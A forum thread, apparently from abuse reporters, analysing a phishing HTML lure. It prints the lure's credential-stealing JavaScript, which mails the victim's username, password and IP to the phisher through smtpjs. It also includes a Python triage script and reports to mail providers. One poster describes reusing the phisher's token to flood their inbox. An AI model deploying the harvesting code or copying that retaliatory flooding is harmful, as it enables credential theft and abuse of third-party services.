Attached was an HTML file; looking at the source (220609-phish - Pastebin.com), it was obfuscated using document.write().
The rendered page is a pretty solid phishing page, except of course for the occasional diacritic/accent letters used to get around spam blockers.
Here is the function code used to harvest the credentials:
    function sendEmail() {
        // Refuse to run until both credential fields are filled in
        if (document.getElementById('username').value === '') {
            alert('Username is Empty');
            return false;
        }
        if (document.getElementById('password').value === '') {
            alert('Password is Empty');
            return false;
        }
        // Swap the visible panel (Div11 -> Div12) to mimic a "signing in" screen
        var BTY = document.getElementById("Div11");
        var BTZ = document.getElementById("Div12");
        if (BTY.style.display === "block" && BTZ.style.display === "none") {
            BTY.style.display = "none";
            BTZ.style.display = "block";
        }
        // After 3 seconds, advance to the next page of the lure (Div1 -> Div2)
        setTimeout(function() {
            var x = document.getElementById("Div1");
            var y = document.getElementById("Div2");
            if (x.style.display === "block" && y.style.display === "none") {
                x.style.display = "none";
                y.style.display = "block";
            }
        }, 3000);
        // Pre-fill the next page's username field, then collect the values to exfiltrate
        document.getElementById('username2').value = document.getElementById('username').value;
        var username = document.getElementById('username').value;
        var password = document.getElementById('password').value;
        var usrip1 = document.getElementById('usrip1').value; // hidden field, populated elsewhere in the page
        // smtpjs: mail the captured credentials straight from the victim's browser
        Email.send({
            SecureToken : "0048d564-8e39-40f8-a0b9-25a716f9d4d7",
            To : '[email protected],[email protected]',
            From : "[email protected]",
            Subject : '3DD: IP: ' + usrip1,
            Body : '3DD: - Username: ' + username + ' || Password: ' + password
        }).then(message); // 'message' is a callback defined elsewhere in the page source
    }
So it takes the username and password you enter, as well as your IP address, and mails it to the phisher’s gmail and mail8b accounts, using smtpjs. The author appears to be legit, but the script allows for encrypting the mail information (i.e. SMTP server name and credentials), so I included the author in my report.
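For anyone doing the same triage, here is an added Python script (not from the original post, and not smtpjs' own code) that turns the analysis above into a repeatable check: it peels a document.write()/unescape() layer off an HTML lure, then reports any smtpjs Email.send() call it finds, the SecureToken and recipient addresses that call carries (the values an abuse report to the relay and mail providers needs), and whether the page contains a password input. The sample page, token and addresses are constructed placeholders; the regexes assume a single string literal per document.write() and a flat Email.send({...}) object literal, which is the shape of the code quoted above.

```python
import re
from typing import Dict, List
from urllib.parse import quote, unquote

# Constructed sample: the inner page (a credential form plus an smtpjs exfil call) is
# hidden behind one document.write(unescape(...)) layer, as the thread describes.
# Token and addresses are placeholders, not the values from the real lure.
INNER_HTML = """<form onsubmit="return sendEmail()">
  <input id="username"><input id="password" type="password">
  <input type="hidden" id="usrip1">
</form>
<script>
function sendEmail() {
  var username = document.getElementById('username').value;
  var password = document.getElementById('password').value;
  var usrip1 = document.getElementById('usrip1').value;
  Email.send({
    SecureToken : "00000000-TOKEN-PLACEHOLDER",
    To : 'attacker-placeholder@example.com,second-placeholder@example.com',
    From : "sender-placeholder@example.com",
    Subject : 'Login: ' + usrip1,
    Body : 'Username: ' + username + ' || Password: ' + password
  });
}
</script>"""
SAMPLE_PAGE = ('<html><body><script>document.write(unescape("'
               + quote(INNER_HTML, safe="") + '"));</script></body></html>')

# document.write("...") or document.write(unescape("...")) with one string literal.
# Assumption: the literal contains no unescaped quote of its own kind (true for
# percent-encoded payloads, where quotes become %22 / %27).
DOC_WRITE_RE = re.compile(
    r"""document\.write\s*\(\s*(?:(unescape)\s*\(\s*)?(['"])(.*?)\2""", re.S)
# smtpjs call: Email.send({ ... }) with a flat object literal (no nested braces).
EMAIL_SEND_RE = re.compile(r"Email\.send\s*\(\s*\{(.*?)\}\s*\)", re.S)
# First string literal assigned to each interesting key inside that object.
FIELD_RE = re.compile(
    r"""\b(SecureToken|To|From|Subject|Body)\b\s*:\s*(['"])(.*?)\2""", re.S)
PASSWORD_INPUT_RE = re.compile(r"""<input[^>]*type\s*=\s*['"]password['"]""", re.I)


def extract_document_write_payloads(html: str) -> List[str]:
    """Return the decoded string literals handed to document.write(); unescape(...)
    wrappers are percent-decoded, plain literals are returned unchanged."""
    payloads = []
    for wrapped, _quote_char, body in DOC_WRITE_RE.findall(html):
        payloads.append(unquote(body) if wrapped else body)
    return payloads


def extract_smtpjs_calls(script: str) -> List[Dict[str, str]]:
    """Pull the SecureToken/To/From/Subject/Body literals out of every Email.send({...})."""
    return [{key: value for key, _q, value in FIELD_RE.findall(m.group(1))}
            for m in EMAIL_SEND_RE.finditer(script)]


def triage(html: str) -> Dict[str, object]:
    """One-pass summary: peel document.write layers, then look for credential
    inputs and browser-side mail exfiltration in the original plus decoded content."""
    payloads = extract_document_write_payloads(html)
    combined = "\n".join([html] + payloads)
    calls = extract_smtpjs_calls(combined)
    recipients = sorted({addr.strip() for c in calls
                         for addr in c.get("To", "").split(",") if addr.strip()})
    tokens = sorted({c["SecureToken"] for c in calls if "SecureToken" in c})
    has_password = bool(PASSWORD_INPUT_RE.search(combined))
    return {
        "document_write_layers": len(payloads),
        "credential_form": has_password,
        "exfil_calls": calls,
        "recipients": recipients,   # report these to the mailbox providers
        "tokens": tokens,           # report these to the smtpjs / SMTP relay operator
        "verdict": ("credential phishing with smtpjs exfiltration"
                    if calls and has_password else "no smtpjs exfiltration found"),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PAGE).items():
        print(f"{key}: {value}")
```

Run it against a saved copy of the lure instead of SAMPLE_PAGE to get the token and recipient list for the abuse reports; a page that stacks several document.write() layers will need the decode loop applied again to each payload, which the one-layer version above deliberately does not do.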
Yeah, there’s a lot more; I just pulled out the piece of code that is called by the submit button. There are actually six separate pages in there that load as you complete them, and each one sends an email to the phisher.
This should be more readable. The code does not have any way to get the user's IP. The username and password need to be entered, and then submit is hit when the user clicks on them.
Sorry, I did not see that, but it will fill 4 hidden fields in your browser and it will only send if the button is submitted.
Just in case, remove the var ipx = data.ip or the entire script tag if you're viewing it.
I did use this about 9 hrs ago, but it seems like they got alerted and renewed the secure token, so it should not send any info to new victims if they open it.
This should in theory send them an email every 10 milliseconds. I ran it for about 5 mins, or 300000 milliseconds at least, so their emails should be flooded with 30000 emails if smtpjs does not have a rate limit; not sure about gmail, it might have something to counter this.
Please send the email to the probable hosting company of the email server, monovm, as their nameservers are used.
I have reported it to elasticmail.com, the service which they use to send the email in the phishing page, and they say they have permanently banned the account.